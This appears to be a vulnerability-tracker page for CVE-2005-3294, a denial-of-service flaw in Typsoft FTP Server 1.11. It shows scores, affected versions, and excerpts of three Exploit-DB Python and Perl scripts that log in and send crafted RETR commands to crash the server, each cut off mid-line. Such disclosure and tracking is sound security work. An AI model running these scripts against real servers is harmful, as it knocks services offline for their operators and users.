CVE-2005-3294
published 2005-10-23CVE-2005-3294: Typsoft FTP Server 1.11, with "Sub Directory Include" enabled, allows remote attackers to cause a denial of service (crash) by sending multiple RETR commands…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
7.68%
93.8th percentile
Typsoft FTP Server 1.11, with "Sub Directory Include" enabled, allows remote attackers to cause a denial of service (crash) by sending multiple RETR commands. NOTE: it was later reported that 1.10 is also affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| typsoft | typsoft_ftp_server | <= 1.11 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
exploitdb·2010-12-29·CVSS 5.0
CVE-2005-3294 [MEDIUM] TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
---
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#
import socket
import sys
user="test"
pwd="test"
buffer="\x41"
print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffe
Exploit-DB
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)
exploitdb·2010-05-14
CVE-2005-3294 TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)
---
# Tested on: Windows XP, SP2 (EN)
#!/usr/bin/python
print "\n#################################################################"
print "## RedTeam Security ##"
print "## TYPSoft FTP Server RETR Command DoS ##"
print "## Version 1.10 ##"
print "## ##"
print "## Jeremiah Talamantes ##"
print "## [email protected] ##"
print "################################################################# \n"
import socket
import sys
# Description:
# RETR command overflow with no PORT specified
# Define the exploit's usage
def Usage():
print ("Usage: scriptname.py \n")
print ("\n\nCredit: Jeremiah Talamantes")
print ("RedTeam Security : www.redteamsecure.com/labs\n")
# Buffer
buffer="AAAA" * 496
def exploit(hostname,username,password):
i=
Exploit-DB
TYPSoft FTP Server 1.11 - 'RETR' Denial of Service
exploitdb·2005-10-14
CVE-2005-3294 TYPSoft FTP Server 1.11 - 'RETR' Denial of Service
TYPSoft FTP Server 1.11 - 'RETR' Denial of Service
---
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "\n-= TYPSoft FTP Server 3) { die "usage: perl typsoft-1.11-DOS.pl [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";
print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and pri
No writeups or analysis indexed.
http://secunia.com/advisories/17196http://www.exploit-db.com/exploits/15860http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txthttp://www.osvdb.org/19992http://www.securityfocus.com/bid/15104http://secunia.com/advisories/17196http://www.exploit-db.com/exploits/15860http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txthttp://www.osvdb.org/19992http://www.securityfocus.com/bid/15104
2005-10-23
Published